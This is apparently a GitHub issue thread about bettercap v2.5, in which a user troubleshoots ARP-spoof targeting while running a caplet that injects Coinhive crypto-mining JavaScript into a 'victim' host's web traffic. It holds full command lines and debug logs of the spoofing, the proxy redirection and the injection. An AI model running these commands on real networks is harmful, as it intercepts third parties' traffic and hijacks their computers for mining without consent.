setting arp.spoof.targets manually fails at injecting js code while using eval flag works perfectly

[euri10]

Environment

Please provide:

• Bettercap version you are using. v2.5
• OS version and architecture you are using. debian sid
• Go version if building from sources. 1.10
• Command line arguments you are using. see below, success and failure
• Caplet code you are using or the interactive session commands.
• Full debug output while reproducing the issue ( bettercap -debug ... ).

greetings, after some errands here I am, it's possible I'm not using the arp spoofing correctly but I couldn't find an answer reading through the doc.

sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap -eval "set arp.spoof.targets 10.3.33.135" --debug works fine, it injects the js code etc...

Now on the very same html page, the js code is not included anymore when I don't use the eval flag and I set the target manually afterwards.

In that case a get arp.spoof.targets shows effectively the relevant ip set, but the debug log never shows the arp spoof attempts like [14:21:50] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8. nor the success of a spoof like 10.3.32.0/22 > 10.3.32.38 » [14:33:50] [sys.log] [dbg] (http.proxy) > 10.3.33.135:54442 GET example.com/

I thought, maybe wrongly, that when the arp.spoof.targets wasn't set, the entire subnet was a target, is this the case ?

If that's correct then I'm afraid that the same target without the eval flag fails at getting spoofed.

success with eval:

➜  ~ sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap -eval "set arp.spoof.targets 10.3.33.135" --debug
bettercap v2.5 (type 'help' for a list of commands)

[14:39:07] [mod.started] update
[14:39:07] [endpoint.new] Endpoint 10.3.32.36 detected as 54:ab:3a:83:07:e4 (Quanta Computer).
[14:39:07] [endpoint.new] Endpoint 10.3.33.18 detected as 00:11:32:71:48:65 (Synology Incorporated).
[14:39:07] [endpoint.new] Endpoint 10.3.32.123 detected as b8:27:eb:55:02:5f (Raspberry Pi Foundation).
[14:39:07] [sys.log] [dbg] Applied redirection [eno1] (TCP) :80 -> 10.3.32.38:8080
[14:39:07] [sys.log] [inf] http.proxy started on 10.3.32.38:8080 (sslstrip disabled)
[14:39:07] [endpoint.new] Endpoint 10.3.32.74 detected as 2c:f0:ee:11:ec:d2 (Apple).
[14:39:08] [sys.log] [inf] You are running 2.5 which is the latest stable version.
[14:39:08] [sys.log] [dbg]  addresses=[10.3.33.135] macs=[] whitelisted-addresses=[] whitelisted-macs=[]
10.3.32.0/22 > 10.3.32.38  » [14:39:08] [sys.log] [inf] ARP spoofer started, probing 1 targets.
10.3.32.0/22 > 10.3.32.38  » [14:39:08] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.
10.3.32.0/22 > 10.3.32.38  » [14:39:09] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.
10.3.32.0/22 > 10.3.32.38  » [14:39:10] [sys.log] [dbg] (http.proxy) < 10.3.33.135:54871 GET example.com/
10.3.32.0/22 > 10.3.32.38  » [14:39:10] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.
10.3.32.0/22 > 10.3.32.38  » [14:39:10] [sys.log] [dbg] (http.proxy) > 10.3.33.135:54871 GET example.com/
10.3.32.0/22 > 10.3.32.38  » [14:39:11] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.
10.3.32.0/22 > 10.3.32.38  » [14:39:12] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.
10.3.32.0/22 > 10.3.32.38  » [14:39:13] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.
10.3.32.0/22 > 10.3.32.38  » [14:39:14] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.
10.3.32.0/22 > 10.3.32.38  » [14:39:14] [sys.log] [dbg] (http.proxy) < 10.3.33.135:54871 GET example.com/
10.3.32.0/22 > 10.3.32.38  » [14:39:14] [sys.log] [dbg] (http.proxy) > 10.3.33.135:54871 GET example.com/
10.3.32.0/22 > 10.3.32.38  » [14:39:14] [sys.log] [inf] we are in coinhive
10.3.32.0/22 > 10.3.32.38  » [14:39:15] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.
10.3.32.0/22 > 10.3.32.38  » [14:39:15] [endpoint.new] Endpoint 10.3.32.136 detected as f0:98:9d:f1:22:18.
10.3.32.0/22 > 10.3.32.38  » [14:39:16] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.

failure without, no spoof happens

➜  ~ sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap --debug
bettercap v2.5 (type 'help' for a list of commands)

[14:39:59] [mod.started] net.recon
[14:39:59] [sys.log] [inf] Javascript Crypto Miner loaded.

    Miner: Coinhive
    Targets: undefined

[14:39:59] [endpoint.new] Endpoint 10.3.32.37 detected as 3c:a0:67:8c:69:ab (Liteon Technology).
[14:39:59] [endpoint.new] Endpoint 10.3.32.22 detected as 00:e0:4c:68:0e:be (Realtek Semiconductor).
[14:39:59] [sys.log] [dbg] Applied redirection [eno1] (TCP) :80 -> 10.3.32.38:8080
[14:39:59] [sys.log] [inf] http.proxy started on 10.3.32.38:8080 (sslstrip disabled)
[14:40:00] [endpoint.new] Endpoint 10.3.32.136 detected as f0:98:9d:f1:22:18.
[14:40:00] [sys.log] [inf] You are running 2.5 which is the latest stable version.
[14:40:01] [sys.log] [dbg]  addresses=[10.3.32.0 10.3.32.1 10.3.32.2 10.3.32.3 10.3.32.4 10.3.32.5 10.3.32.6 10.3.32.7 10.3.32.8 10.3.32.9 10.3.32.10 10.3.32.11 10.3.32.12 10.3.32.13 10.3.32.14 10.3.32.15 10.3.32.16 10.3.32.17 10.3.32.18 10.3.32.19 10.3.32.20 10.3.32.21 10.3.32.22 10.3.32.23 10.3.32.24 10.3.32.25 10.3.32.26 10.3.32.27 10.3.32.28 10.3.32.29 10.3.32.30 10.3.32.31 10.3.32.32 10.3.32.33 10.3.32.34 10.3.32.35 10.3.32.36 10.3.32.37 10.3.32.38 10.3.32.39 10.3.32.40 10.3.32.41 10.3.32.42 10.3.32.43 10.3.32.44 10.3.32.45 10.3.32.46 10.3.32.47 10.3.32.48 10.3.32.49 10.3.32.50 10.3.32.51 10.3.32.52 10.3.32.53 10.3.32.54 10.3.32.55 10.3.32.56 10.3.32.57 10.3.32.58 10.3.32.59 10.3.32.60 10.3.32.61 10.3.32.62 10.3.32.63 10.3.32.64 10.3.32.65 10.3.32.66 10.3.32.67 10.3.32.68 10.3.32.69 10.3.32.70 10.3.32.71 10.3.32.72 10.3.32.73 10.3.32.74 10.3.32.75 10.3.32.76 10.3.32.77 10.3.32.78 10.3.32.79 10.3.32.80 10.3.32.81 10.3.32.82 10.3.32.83 10.3.32.84 10.3.32.85 10.3.32.86 10.3.32.87 10.3.32.88 10.3.32.89 10.3.32.90 10.3.32.91 10.3.32.92 10.3.32.93 10.3.32.94 10.3.32.95 10.3.32.96 10.3.32.97 10.3.32.98 10.3.32.99 10.3.32.100 10.3.32.101 10.3.32.102 10.3.32.103 10.3.32.104 10.3.32.105 10.3.32.106 10.3.32.107 10.3.32.108 10.3.32.109 10.3.32.110 10.3.32.111 10.3.32.112 10.3.32.113 10.3.32.114 10.3.32.115 10.3.32.116 10.3.32.117 10.3.32.118 10.3.32.119 10.3.32.120 10.3.32.121 10.3.32.122 10.3.32.123 10.3.32.124 10.3.32.125 10.3.32.126 10.3.32.127 10.3.32.128 10.3.32.129 10.3.32.130 10.3.32.131 10.3.32.132 10.3.32.133 10.3.32.134 10.3.32.135 10.3.32.136 10.3.32.137 10.3.32.138 10.3.32.139 10.3.32.140 10.3.32.141 10.3.32.142 10.3.32.143 10.3.32.144 10.3.32.145 10.3.32.146 10.3.32.147 10.3.32.148 10.3.32.149 10.3.32.150 10.3.32.151 10.3.32.152 10.3.32.153 10.3.32.154 10.3.32.155 10.3.32.156 10.3.32.157 10.3.32.158 10.3.32.159 10.3.32.160 10.3.32.161 10.3.32.162 10.3.32.163 10.3.32.164 10.3.32.165 10.3.32.166 10.3.32.167 10.3.32.168 10.3.32.169 10.3.32.170 10.3.32.171 10.3.32.172 10.3.32.173 10.3.32.174 10.3.32.175 10.3.32.176 10.3.32.177 10.3.32.178 10.3.32.179 10.3.32.180 10.3.32.181 10.3.32.182 10.3.32.183 10.3.32.184 10.3.32.185 10.3.32.186 10.3.32.187 10.3.32.188 10.3.32.189 10.3.32.190 10.3.32.191 10.3.32.192 10.3.32.193 10.3.32.194 10.3.32.195 10.3.32.196 10.3.32.197 10.3.32.198 10.3.32.199 10.3.32.200 10.3.32.201 10.3.32.202 10.3.32.203 10.3.32.204 10.3.32.205 10.3.32.206 10.3.32.207 10.3.32.208 10.3.32.209 10.3.32.210 10.3.32.211 10.3.32.212 10.3.32.213 10.3.32.214 10.3.32.215 10.3.32.216 10.3.32.217 10.3.32.218 10.3.32.219 10.3.32.220 10.3.32.221 10.3.32.222 10.3.32.223 10.3.32.224 10.3.32.225 10.3.32.226 10.3.32.227 10.3.32.228 10.3.32.229 10.3.32.230 10.3.32.231 10.3.32.232 10.3.32.233 10.3.32.234 10.3.32.235 10.3.32.236 10.3.32.237 10.3.32.238 10.3.32.239 10.3.32.240 10.3.32.241 10.3.32.242 10.3.32.243 10.3.32.244 10.3.32.245 10.3.32.246 10.3.32.247 10.3.32.248 10.3.32.249 10.3.32.250 10.3.32.251 10.3.32.252 10.3.32.253 10.3.32.254 10.3.32.255 10.3.33.0 10.3.33.1 10.3.33.2 10.3.33.3 10.3.33.4 10.3.33.5 10.3.33.6 10.3.33.7 10.3.33.8 10.3.33.9 10.3.33.10 10.3.33.11 10.3.33.12 10.3.33.13 10.3.33.14 10.3.33.15 10.3.33.16 10.3.33.17 10.3.33.18 10.3.33.19 10.3.33.20 10.3.33.21 10.3.33.22 10.3.33.23 10.3.33.24 10.3.33.25 10.3.33.26 10.3.33.27 10.3.33.28 10.3.33.29 10.3.33.30 10.3.33.31 10.3.33.32 10.3.33.33 10.3.33.34 10.3.33.35 10.3.33.36 10.3.33.37 10.3.33.38 10.3.33.39 10.3.33.40 10.3.33.41 10.3.33.42 10.3.33.43 10.3.33.44 10.3.33.45 10.3.33.46 10.3.33.47 10.3.33.48 10.3.33.49 10.3.33.50 10.3.33.51 10.3.33.52 10.3.33.53 10.3.33.54 10.3.33.55 10.3.33.56 10.3.33.57 10.3.33.58 10.3.33.59 10.3.33.60 10.3.33.61 10.3.33.62 10.3.33.63 10.3.33.64 10.3.33.65 10.3.33.66 10.3.33.67 10.3.33.68 10.3.33.69 10.3.33.70 10.3.33.71 10.3.33.72 10.3.33.73 10.3.33.74 10.3.33.75 10.3.33.76 10.3.33.77 10.3.33.78 10.3.33.79 10.3.33.80 10.3.33.81 10.3.33.82 10.3.33.83 10.3.33.84 10.3.33.85 10.3.33.86 10.3.33.87 10.3.33.88 10.3.33.89 10.3.33.90 10.3.33.91 10.3.33.92 10.3.33.93 10.3.33.94 10.3.33.95 10.3.33.96 10.3.33.97 10.3.33.98 10.3.33.99 10.3.33.100 10.3.33.101 10.3.33.102 10.3.33.103 10.3.33.104 10.3.33.105 10.3.33.106 10.3.33.107 10.3.33.108 10.3.33.109 10.3.33.110 10.3.33.111 10.3.33.112 10.3.33.113 10.3.33.114 10.3.33.115 10.3.33.116 10.3.33.117 10.3.33.118 10.3.33.119 10.3.33.120 10.3.33.121 10.3.33.122 10.3.33.123 10.3.33.124 10.3.33.125 10.3.33.126 10.3.33.127 10.3.33.128 10.3.33.129 10.3.33.130 10.3.33.131 10.3.33.132 10.3.33.133 10.3.33.134 10.3.33.135 10.3.33.136 10.3.33.137 10.3.33.138 10.3.33.139 10.3.33.140 10.3.33.141 10.3.33.142 10.3.33.143 10.3.33.144 10.3.33.145 10.3.33.146 10.3.33.147 10.3.33.148 10.3.33.149 10.3.33.150 10.3.33.151 10.3.33.152 10.3.33.153 10.3.33.154 10.3.33.155 10.3.33.156 10.3.33.157 10.3.33.158 10.3.33.159 10.3.33.160 10.3.33.161 10.3.33.162 10.3.33.163 10.3.33.164 10.3.33.165 10.3.33.166 10.3.33.167 10.3.33.168 10.3.33.169 10.3.33.170 10.3.33.171 10.3.33.172 10.3.33.173 10.3.33.174 10.3.33.175 10.3.33.176 10.3.33.177 10.3.33.178 10.3.33.179 10.3.33.180 10.3.33.181 10.3.33.182 10.3.33.183 10.3.33.184 10.3.33.185 10.3.33.186 10.3.33.187 10.3.33.188 10.3.33.189 10.3.33.190 10.3.33.191 10.3.33.192 10.3.33.193 10.3.33.194 10.3.33.195 10.3.33.196 10.3.33.197 10.3.33.198 10.3.33.199 10.3.33.200 10.3.33.201 10.3.33.202 10.3.33.203 10.3.33.204 10.3.33.205 10.3.33.206 10.3.33.207 10.3.33.208 10.3.33.209 10.3.33.210 10.3.33.211 10.3.33.212 10.3.33.213 10.3.33.214 10.3.33.215 10.3.33.216 10.3.33.217 10.3.33.218 10.3.33.219 10.3.33.220 10.3.33.221 10.3.33.222 10.3.33.223 10.3.33.224 10.3.33.225 10.3.33.226 10.3.33.227 10.3.33.228 10.3.33.229 10.3.33.230 10.3.33.231 10.3.33.232 10.3.33.233 10.3.33.234 10.3.33.235 10.3.33.236 10.3.33.237 10.3.33.238 10.3.33.239 10.3.33.240 10.3.33.241 10.3.33.242 10.3.33.243 10.3.33.244 10.3.33.245 10.3.33.246 10.3.33.247 10.3.33.248 10.3.33.249 10.3.33.250 10.3.33.251 10.3.33.252 10.3.33.253 10.3.33.254 10.3.33.255 10.3.34.0 10.3.34.1 10.3.34.2 10.3.34.3 10.3.34.4 10.3.34.5 10.3.34.6 10.3.34.7 10.3.34.8 10.3.34.9 10.3.34.10 10.3.34.11 10.3.34.12 10.3.34.13 10.3.34.14 10.3.34.15 10.3.34.16 10.3.34.17 10.3.34.18 10.3.34.19 10.3.34.20 10.3.34.21 10.3.34.22 10.3.34.23 10.3.34.24 10.3.34.25 10.3.34.26 10.3.34.27 10.3.34.28 10.3.34.29 10.3.34.30 10.3.34.31 10.3.34.32 10.3.34.33 10.3.34.34 10.3.34.35 10.3.34.36 10.3.34.37 10.3.34.38 10.3.34.39 10.3.34.40 10.3.34.41 10.3.34.42 10.3.34.43 10.3.34.44 10.3.34.45 10.3.34.46 10.3.34.47 10.3.34.48 10.3.34.49 10.3.34.50 10.3.34.51 10.3.34.52 10.3.34.53 10.3.34.54 10.3.34.55 10.3.34.56 10.3.34.57 10.3.34.58 10.3.34.59 10.3.34.60 10.3.34.61 10.3.34.62 10.3.34.63 10.3.34.64 10.3.34.65 10.3.34.66 10.3.34.67 10.3.34.68 10.3.34.69 10.3.34.70 10.3.34.71 10.3.34.72 10.3.34.73 10.3.34.74 10.3.34.75 10.3.34.76 10.3.34.77 10.3.34.78 10.3.34.79 10.3.34.80 10.3.34.81 10.3.34.82 10.3.34.83 10.3.34.84 10.3.34.85 10.3.34.86 10.3.34.87 10.3.34.88 10.3.34.89 10.3.34.90 10.3.34.91 10.3.34.92 10.3.34.93 10.3.34.94 10.3.34.95 10.3.34.96 10.3.34.97 10.3.34.98 10.3.34.99 10.3.34.100 10.3.34.101 10.3.34.102 10.3.34.103 10.3.34.104 10.3.34.105 10.3.34.106 10.3.34.107 10.3.34.108 10.3.34.109 10.3.34.110 10.3.34.111 10.3.34.112 10.3.34.113 10.3.34.114 10.3.34.115 10.3.34.116 10.3.34.117 10.3.34.118 10.3.34.119 10.3.34.120 10.3.34.121 10.3.34.122 10.3.34.123 10.3.34.124 10.3.34.125 10.3.34.126 10.3.34.127 10.3.34.128 10.3.34.129 10.3.34.130 10.3.34.131 10.3.34.132 10.3.34.133 10.3.34.134 10.3.34.135 10.3.34.136 10.3.34.137 10.3.34.138 10.3.34.139 10.3.34.140 10.3.34.141 10.3.34.142 10.3.34.143 10.3.34.144 10.3.34.145 10.3.34.146 10.3.34.147 10.3.34.148 10.3.34.149 10.3.34.150 10.3.34.151 10.3.34.152 10.3.34.153 10.3.34.154 10.3.34.155 10.3.34.156 10.3.34.157 10.3.34.158 10.3.34.159 10.3.34.160 10.3.34.161 10.3.34.162 10.3.34.163 10.3.34.164 10.3.34.165 10.3.34.166 10.3.34.167 10.3.34.168 10.3.34.169 10.3.34.170 10.3.34.171 10.3.34.172 10.3.34.173 10.3.34.174 10.3.34.175 10.3.34.176 10.3.34.177 10.3.34.178 10.3.34.179 10.3.34.180 10.3.34.181 10.3.34.182 10.3.34.183 10.3.34.184 10.3.34.185 10.3.34.186 10.3.34.187 10.3.34.188 10.3.34.189 10.3.34.190 10.3.34.191 10.3.34.192 10.3.34.193 10.3.34.194 10.3.34.195 10.3.34.196 10.3.34.197 10.3.34.198 10.3.34.199 10.3.34.200 10.3.34.201 10.3.34.202 10.3.34.203 10.3.34.204 10.3.34.205 10.3.34.206 10.3.34.207 10.3.34.208 10.3.34.209 10.3.34.210 10.3.34.211 10.3.34.212 10.3.34.213 10.3.34.214 10.3.34.215 10.3.34.216 10.3.34.217 10.3.34.218 10.3.34.219 10.3.34.220 10.3.34.221 10.3.34.222 10.3.34.223 10.3.34.224 10.3.34.225 10.3.34.226 10.3.34.227 10.3.34.228 10.3.34.229 10.3.34.230 10.3.34.231 10.3.34.232 10.3.34.233 10.3.34.234 10.3.34.235 10.3.34.236 10.3.34.237 10.3.34.238 10.3.34.239 10.3.34.240 10.3.34.241 10.3.34.242 10.3.34.243 10.3.34.244 10.3.34.245 10.3.34.246 10.3.34.247 10.3.34.248 10.3.34.249 10.3.34.250 10.3.34.251 10.3.34.252 10.3.34.253 10.3.34.254 10.3.34.255 10.3.35.0 10.3.35.1 10.3.35.2 10.3.35.3 10.3.35.4 10.3.35.5 10.3.35.6 10.3.35.7 10.3.35.8 10.3.35.9 10.3.35.10 10.3.35.11 10.3.35.12 10.3.35.13 10.3.35.14 10.3.35.15 10.3.35.16 10.3.35.17 10.3.35.18 10.3.35.19 10.3.35.20 10.3.35.21 10.3.35.22 10.3.35.23 10.3.35.24 10.3.35.25 10.3.35.26 10.3.35.27 10.3.35.28 10.3.35.29 10.3.35.30 10.3.35.31 10.3.35.32 10.3.35.33 10.3.35.34 10.3.35.35 10.3.35.36 10.3.35.37 10.3.35.38 10.3.35.39 10.3.35.40 10.3.35.41 10.3.35.42 10.3.35.43 10.3.35.44 10.3.35.45 10.3.35.46 10.3.35.47 10.3.35.48 10.3.35.49 10.3.35.50 10.3.35.51 10.3.35.52 10.3.35.53 10.3.35.54 10.3.35.55 10.3.35.56 10.3.35.57 10.3.35.58 10.3.35.59 10.3.35.60 10.3.35.61 10.3.35.62 10.3.35.63 10.3.35.64 10.3.35.65 10.3.35.66 10.3.35.67 10.3.35.68 10.3.35.69 10.3.35.70 10.3.35.71 10.3.35.72 10.3.35.73 10.3.35.74 10.3.35.75 10.3.35.76 10.3.35.77 10.3.35.78 10.3.35.79 10.3.35.80 10.3.35.81 10.3.35.82 10.3.35.83 10.3.35.84 10.3.35.85 10.3.35.86 10.3.35.87 10.3.35.88 10.3.35.89 10.3.35.90 10.3.35.91 10.3.35.92 10.3.35.93 10.3.35.94 10.3.35.95 10.3.35.96 10.3.35.97 10.3.35.98 10.3.35.99 10.3.35.100 10.3.35.101 10.3.35.102 10.3.35.103 10.3.35.104 10.3.35.105 10.3.35.106 10.3.35.107 10.3.35.108 10.3.35.109 10.3.35.110 10.3.35.111 10.3.35.112 10.3.35.113 10.3.35.114 10.3.35.115 10.3.35.116 10.3.35.117 10.3.35.118 10.3.35.119 10.3.35.120 10.3.35.121 10.3.35.122 10.3.35.123 10.3.35.124 10.3.35.125 10.3.35.126 10.3.35.127 10.3.35.128 10.3.35.129 10.3.35.130 10.3.35.131 10.3.35.132 10.3.35.133 10.3.35.134 10.3.35.135 10.3.35.136 10.3.35.137 10.3.35.138 10.3.35.139 10.3.35.140 10.3.35.141 10.3.35.142 10.3.35.143 10.3.35.144 10.3.35.145 10.3.35.146 10.3.35.147 10.3.35.148 10.3.35.149 10.3.35.150 10.3.35.151 10.3.35.152 10.3.35.153 10.3.35.154 10.3.35.155 10.3.35.156 10.3.35.157 10.3.35.158 10.3.35.159 10.3.35.160 10.3.35.161 10.3.35.162 10.3.35.163 10.3.35.164 10.3.35.165 10.3.35.166 10.3.35.167 10.3.35.168 10.3.35.169 10.3.35.170 10.3.35.171 10.3.35.172 10.3.35.173 10.3.35.174 10.3.35.175 10.3.35.176 10.3.35.177 10.3.35.178 10.3.35.179 10.3.35.180 10.3.35.181 10.3.35.182 10.3.35.183 10.3.35.184 10.3.35.185 10.3.35.186 10.3.35.187 10.3.35.188 10.3.35.189 10.3.35.190 10.3.35.191 10.3.35.192 10.3.35.193 10.3.35.194 10.3.35.195 10.3.35.196 10.3.35.197 10.3.35.198 10.3.35.199 10.3.35.200 10.3.35.201 10.3.35.202 10.3.35.203 10.3.35.204 10.3.35.205 10.3.35.206 10.3.35.207 10.3.35.208 10.3.35.209 10.3.35.210 10.3.35.211 10.3.35.212 10.3.35.213 10.3.35.214 10.3.35.215 10.3.35.216 10.3.35.217 10.3.35.218 10.3.35.219 10.3.35.220 10.3.35.221 10.3.35.222 10.3.35.223 10.3.35.224 10.3.35.225 10.3.35.226 10.3.35.227 10.3.35.228 10.3.35.229 10.3.35.230 10.3.35.231 10.3.35.232 10.3.35.233 10.3.35.234 10.3.35.235 10.3.35.236 10.3.35.237 10.3.35.238 10.3.35.239 10.3.35.240 10.3.35.241 10.3.35.242 10.3.35.243 10.3.35.244 10.3.35.245 10.3.35.246 10.3.35.247 10.3.35.248 10.3.35.249 10.3.35.250 10.3.35.251 10.3.35.252 10.3.35.253 10.3.35.254 10.3.35.255] macs=[] whitelisted-addresses=[] whitelisted-macs=[]
10.3.32.0/22 > 10.3.32.38  » [14:40:01] [sys.log] [dbg] Could not find hardware address for 10.3.32.0, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » s[14:40:02] [sys.log] [dbg] Could not find hardware address for 10.3.32.2, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » se[14:40:02] [sys.log] [dbg] Could not find hardware address for 10.3.32.3, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » se[14:40:02] [endpoint.new] Endpoint 10.3.32.79 detected as 8c:85:90:33:11:97.
10.3.32.0/22 > 10.3.32.38  » set[14:40:03] [sys.log] [dbg] Could not find hardware address for 10.3.32.4, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set a[14:40:03] [sys.log] [dbg] Could not find hardware address for 10.3.32.6, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp[14:40:04] [sys.log] [dbg] Could not find hardware address for 10.3.32.7, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.[14:40:04] [sys.log] [dbg] Could not find hardware address for 10.3.32.9, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.[14:40:05] [sys.log] [dbg] Could not find hardware address for 10.3.32.10, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets [14:40:05] [sys.log] [dbg] Could not find hardware address for 10.3.32.14, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets [14:40:06] [sys.log] [dbg] Could not find hardware address for 10.3.32.15, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 1[14:40:06] [sys.log] [dbg] Could not find hardware address for 10.3.32.16, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.[14:40:06] [endpoint.new] Endpoint 10.3.32.74 detected as 2c:f0:ee:11:ec:d2 (Apple).
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.[14:40:07] [sys.log] [dbg] Could not find hardware address for 10.3.32.18, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.[14:40:07] [sys.log] [dbg] Could not find hardware address for 10.3.32.19, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.[14:40:08] [sys.log] [dbg] Could not find hardware address for 10.3.32.20, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.3.[14:40:08] [sys.log] [dbg] Could not find hardware address for 10.3.32.21, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.3.33[14:40:09] [sys.log] [dbg] Could not find hardware address for 10.3.32.23, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.3.33.1[14:40:09] [sys.log] [dbg] Could not find hardware address for 10.3.32.24, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.3.33.13[14:40:10] [sys.log] [dbg] Could not find hardware address for 10.3.32.25, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.3.33.135
10.3.32.0/22 > 10.3.32.38  » [14:40:10] [sys.log] [dbg] env.change: arp.spoof.targets -> '10.3.33.135'
10.3.32.0/22 > 10.3.32.38  » [14:40:10] [sys.log] [dbg] Could not find hardware address for 10.3.32.26, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:11] [sys.log] [dbg] Could not find hardware address for 10.3.32.27, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:11] [sys.log] [dbg] Could not find hardware address for 10.3.32.29, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:12] [sys.log] [dbg] Could not find hardware address for 10.3.32.30, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:12] [sys.log] [dbg] Could not find hardware address for 10.3.32.32, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:13] [endpoint.lost] Endpoint 10.3.32.136 lost.
10.3.32.0/22 > 10.3.32.38  » [14:40:13] [sys.log] [dbg] Could not find hardware address for 10.3.32.34, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:14] [endpoint.lost] Endpoint 10.3.32.79 lost.
10.3.32.0/22 > 10.3.32.38  » [14:40:14] [sys.log] [dbg] Could not find hardware address for 10.3.32.38, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:15] [sys.log] [dbg] Could not find hardware address for 10.3.32.40, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:15] [sys.log] [dbg] Could not find hardware address for 10.3.32.41, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:16] [endpoint.lost] Endpoint 10.3.32.74 (Apple) lost.
10.3.32.0/22 > 10.3.32.38  » [14:40:16] [sys.log] [dbg] Could not find hardware address for 10.3.32.44, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:16] [endpoint.new] Endpoint 10.3.32.74 detected as 2c:f0:ee:11:ec:d2 (Apple).
10.3.32.0/22 > 10.3.32.38  » [14:40:17] [sys.log] [dbg] Could not find hardware address for 10.3.32.45, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:17] [sys.log] [dbg] Could not find hardware address for 10.3.32.46, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:18] [sys.log] [dbg] Could not find hardware address for 10.3.32.47, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:18] [sys.log] [dbg] Could not find hardware address for 10.3.32.48, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:18] [endpoint.new] Endpoint 10.3.33.17 detected as 40:e2:30:25:7f:c1 (AzureWave Technology).
10.3.32.0/22 > 10.3.32.38  » [14:40:19] [sys.log] [dbg] Could not find hardware address for 10.3.32.49, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:19] [sys.log] [dbg] Could not find hardware address for 10.3.32.50, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:20] [sys.log] [dbg] Could not find hardware address for 10.3.32.51, retrying in one second.
10.3.32.0/22 > 10.3.32.38  » [14:40:20] [sys.log] [dbg] Could not find hardware address for 10.3.32.53, retrying in one second.

Steps to Reproduce

1. sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap -eval "set arp.spoof.targets 10.3.33.135" --debug works fine, it injects the js code from the crypto-miner.js
2. sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap -eval --debug then manually enter set arp.spoof.targets 10.3.33.135 and no code is injected, no arp spoof seems to happen

Expected behavior: that both alternatives would be the same --

♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

[euri10]

further testing reveals that when running without eval, I can get the injection with

sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap -eval --debug
set arp.spoof.targets 10.3.33.135
set arp spoof off
set arp spoof on

so this is equivalent to sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap -eval "set arp.spoof.targets 10.3.33.135" --debug

Is it intended behavior that you need to restart the arp spoofing in order to select a target ? ok seems like it is, I failed at seeing this in the docs, sorry, second question still stand, maybe >_)

And if the arp.spoof.targets default is the entire subnet, is there a reason why using just sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap -eval --debug wouldn't hit my 10.3.33.135 target in the first place ?

thanks for your help

[evilsocket]

you answered yourself ... eval will run those commands before activating the modules of the caplet, while if you run them manually, when the session is started, they'll run after the module, meaning you'll need to restart the module itself in order for it to see the changes. As for the other question (targeting the whole subnet) I'd need the debug logs of when this is happening in order to answer you.

[euri10]

So here's a debug log without eval: thanks to the reload.cap I had not read about I can spoof my target after the module has been started But if I target the entire subnet, my "victim" isn't spoofed, where am I failing?

I see the arp targets are updated 10.3.32.0/22 > 10.3.32.38 » [15:21:13] [sys.log] [inf] ARP spoofer started, probing 1024 targets. but any reload of my victim's page fails at getting spoofed. Are there more logs I can provide ?

➜  ~ sudo ./go/bin/bettercap -caplet caplets/crypto-miner.cap
bettercap v2.5 (type 'help' for a list of commands)

